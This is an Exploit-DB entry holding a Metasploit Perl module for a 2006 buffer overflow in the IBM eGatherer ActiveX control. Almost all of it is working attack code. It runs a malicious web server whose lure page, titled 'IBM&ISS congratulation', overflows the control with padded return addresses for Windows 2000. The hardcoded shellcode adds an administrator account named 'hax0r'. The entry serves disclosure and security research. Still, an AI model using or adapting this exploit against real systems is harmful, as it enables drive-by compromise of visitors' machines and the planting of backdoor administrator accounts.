IBM eGatherer <= 3.20.0284.0 ActiveX Remote Code Execution Exploit

2006-08-29T00:00:00
ID EDB-ID:2276
Type exploitdb
Reporter Francisco Amato
Modified 2006-08-29T00:00:00

Description

IBM eGatherer <= 3.20.0284.0 (ActiveX) Remote Code Execution Exploit. CVE-2006-4221. Remote exploit for windows platform

                                        
                                            ##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ibm_egatherer;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use Msf::Encoder;
use IO::Socket::INET;
use IPC::Open3;

my $advanced =
  {
  };

my $info =
  {
	'Name'           =&gt; 'IBM eGatherer ActiveX Code Execution Vulnerability',
	'Version'        =&gt; '$Revision: 1 $',
	'Authors'        =&gt;
	  [
		'Francisco Amato &lt;famato [at] infobyte.com.ar&gt; [ISR] www.infobyte.com.ar',
	  ],

	'Description'    =&gt;
	  Pex::Text::Freeform(qq{
		This module exploits a code execution vulnerability in the IBM eGatherer ActiveX buffer overflow.
}),
        'Arch'           =&gt; [ 'x86' ],
        'OS'    =&gt; ['win32', 'win2000' ],
					
	'Priv'           =&gt; 0,

	'UserOpts'       =&gt;
	  {
		'HTTPPORT' =&gt; [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' =&gt; [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],

	  },

        'AutoOpts'  =&gt;
	          {
            	    'GETPCTYPE' =&gt; 'ebx'
		  },
	'Payload'        =&gt;
	  {
		'Space'    =&gt; 700,
		'BadChars'  =&gt; "\x00\x88\x8e\x89\x83\x96\x98\x91\x80\x9f\x93\x97\x8c\x99\x9c\x9b\x92", # data is downcased				
		'Keys'     =&gt; ['+alphanum'],
		
	  },
	'Refs'           =&gt;
	  [
	  	['OSVDB', '27976'],	  
	  	['CVE', 'CVE-2006-4221'],
	  	['BID', '19554'],
	  	['URL', 'http://research.eeye.com/html/advisories/published/AD20060816.html'],
	  ],

	'DefaultTarget'  =&gt; 0,
	'Targets'        =&gt;
	  [
		[ 'Windows 2000 SP4 English version', 0x75041111, 0x7CE8E1B6  ]
#		[ 'Windows 2000 SP4 English version', 0x41414141, 0x7CE8E1B6  ] test
#		75032DB6
#//7CE8E1B6 CALL ole32.dll
#//75041111 .data WS2_32.DLL		
	  ],
	
	'Keys'           =&gt; [ 'ibm' ],

	'DisclosureDate' =&gt; 'Aug 16 2006',
  };

sub new {
	my $class = shift;
	my $self = $class-&gt;SUPER::new({'Info' =&gt; $info, 'Advanced' =&gt; $advanced}, @_);
	return($self);
}


sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET-&gt;new(
		LocalHost =&gt; $self-&gt;GetVar('HTTPHOST'),
		LocalPort =&gt; $self-&gt;GetVar('HTTPPORT'),
		ReuseAddr =&gt; 1,
		Listen    =&gt; 1,
		Proto     =&gt; 'tcp'
	);
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self-&gt;PrintLine("[-] Failed to create local HTTP listener on " . $self-&gt;GetVar('HTTPPORT'));
		return;
	}

	my $httphost = ($self-&gt;GetVar('HTTPHOST') eq '0.0.0.0') ?
		Pex::Utils::SourceIP('1.2.3.4') :
		$self-&gt;GetVar('HTTPHOST');

	$self-&gt;PrintLine("[*] Waiting for connections to http://". $httphost .":". $self-&gt;GetVar('HTTPPORT') ."/");

	while (defined($client = $server-&gt;accept())) {
		$self-&gt;HandleHttpClient(Msf::Socket::Tcp-&gt;new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd-&gt;PeerPort, $fd-&gt;PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split(/ /, $fd-&gt;RecvLine(10), 3);
	my $agent;
	
	# Read in the HTTP headers
	while ((my $line = $fd-&gt;RecvLine(10))) {
		
		$line =~ s/^\s+|\s+$//g;
		
		my ($var, $val) = split(/\:/, $line, 2);

		# Break out if we reach the end of the headers
		last if (not defined($var) or not defined($val));

		$agent = $val if $var =~ /User-Agent/i;
	}
	
	my $os = 'Unknown';
	my $vl = ($agent =~ m/Windows/) ? 'Vulnerable' : 'Not Vulnerable';
	
	$os = 'Linux'     if $agent =~ /Linux/i;
	$os = 'Mac OS X'  if $agent =~ /OS X/i;
	$os = 'Windows'   if $agent =~ /Windows/i;	
	
	
	$self-&gt;PrintLine("[*] Client connected from $rhost:$rport ($os/$vl).");
	
	if ($os ne 'Windows') {
		$self-&gt;PrintLine("[*] Invalid target for this exploit, trying anyways...");
	} else {
		$self-&gt;PrintLine("[*] Sending payload and waiting for execution...");	
	}

	my $res = $fd-&gt;Send($self-&gt;BuildResponse($self-&gt;GenerateHTML()));

	$fd-&gt;Close();
}

sub JSUnescape2 {
	#TODO: add to Pex:Utils:JSUnescape like type of mode
        my $data = shift;
        my $mode = shift() || 'LE';
        my $code = '';

        # Encode the shellcode via %u sequences for JS's unescape() function
        my $idx = 0;

        # Pad to an even number of bytes
        if (length($data) % 2 != 0) {
                $data .= substr($data, -1, 1);
        }

        while ($idx &lt; length($data) - 1) {
                my $c1 = ord(substr($data, $idx, 1));
                my $c2 = ord(substr($data, $idx+1, 1));
                if ($mode eq 'LE') {
                        $code .= sprintf('%%%.2x%%%.2x', $c2, $c1);
                } else {
                        $code .= sprintf('%%%.2x%%%.2x', $c1, $c2);
                }
                $idx += 2;
        }

        return $code;
}


sub GenerateHTML {
	my $self        = shift;
	my $target      = $self-&gt;Targets-&gt;[$self-&gt;GetVar('TARGET')];
	my $shellcode = JSUnescape2($self-&gt;GetVar('EncodedPayload')-&gt;Payload, 'RE');	
        my $offsetdata = JSUnescape2(pack('V', $target-&gt;[1]),'R');
	my $offsetesp = JSUnescape2(pack('V', $target-&gt;[2]),'R');

#adduser, user: hax0r pass: vete
my $shellcode = '%31%c9%66%b9%30%72%51%68%20%68%61%78%68%2f%41%44%44%68%72%65%73%20%68%72%61%64%6f%68%6e%69%73%74%68%41%64%6d%69%68%6f%75%70%20%68%61%6c%67%72%68%20%6c%6f%63%68%20%6e%65%74%68%44%20%26%26%68%20%2f%41%44%68%76%65%74%65%68%78%30%72%20%68%72%20%68%61%68%20%75%73%65%68%20%6e%65%74%68%65%20%2f%63%68%64%2e%65%78%68%41%41%63%6d%31%c0%50%31%c0%8d%4c%24%06%51%bb%fa%74%59%7c%ff%d3%31%c0%50%bb%be%69%47%79%ff%d3';
#$self-&gt;PrintLine($shellcode2);
#my $shellcode = $shellcode2;


	my $data        = qq#
&lt;html&gt;
&lt;head&gt;
	&lt;title&gt;IBM&ISS congratulation&lt;/title&gt;

&lt;/head&gt;
&lt;object classid='clsid:74FFE28D-2378-11D5-990C-006094235084' id='notCompromising'&gt;&lt;/object&gt;
&lt;script&gt;
var buff="";
for (i=0;i&lt;260;i++) buff=buff+unescape("%90"); //padding
//75041111 .data WS2_32.DLL
buff=buff+unescape("$offsetdata"); //.data
buff=buff+unescape("$offsetdata"); //.data
for (i=0;i&lt;12;i++) buff=buff+unescape("%90"); //padding
//7CE4F8A6 CALL ESP ole32.dll
buff=buff+unescape("$offsetesp"); //write eip
buff=buff+unescape("$offsetesp"); //write eip
for (i=0;i&lt;80;i++) buff=buff+unescape("%90"); //padding
//JMP safe ? shellcode
buff=buff+unescape("%E9%FD%FA%FF%FF"); //adduser
//buff=buff+unescape("%E9%2B%F8%FF%FF"); //size 500
//buff=buff+unescape("%E9%AF%F6%FF%FF");  //size 700
for (i=0;i&lt;80;i++) buff=buff+unescape("%90"); //padding

//shellcode TODO: copy writeable memory
buff=buff+unescape("$shellcode");

for (i=0;i&lt;50;i++)buff=buff+unescape("%90"); //shit

var comp = document.getElementById('notCompromising');
comp.RunEgatherer(buff);
//alert(buff);

&lt;/script&gt;

&lt;/body&gt;
&lt;/html&gt;
#;
	return $data;
}

sub BuildResponse {
	my ($self, $content) = @_;

	my $response =
	  "HTTP/1.1 200 OK\r\n" .
	  "Content-Type: text/html\r\n";

	if ($self-&gt;GetVar('Gzip')) {
		$response .= "Content-Encoding: gzip\r\n";
		$content = $self-&gt;Gzip($content);
	}
	if ($self-&gt;GetVar('Chunked')) {
		$response .= "Transfer-Encoding: chunked\r\n";
		$content = $self-&gt;Chunk($content);
	} else {
		$response .= 'Content-Length: ' . length($content) . "\r\n" .
		  "Connection: close\r\n";
	}

	$response .= "\r\n" . $content;

	return $response;
}

sub Chunk {
	my ($self, $content) = @_;

	my $chunked;
	while (length($content)) {
		my $chunk = substr($content, 0, int(rand(10) + 1), '');
		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
	}
	$chunked .= "0\r\n\r\n";

	return $chunked;
}

sub Gzip {
	my $self = shift;
	my $data = shift;
	my $comp = int(rand(5))+5;

	my($wtr, $rdr, $err);

	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
	print $wtr $data;
	close ($wtr);
	local $/;

	return (&lt;$rdr&gt;);
}

1;

# milw0rm.com [2006-08-29]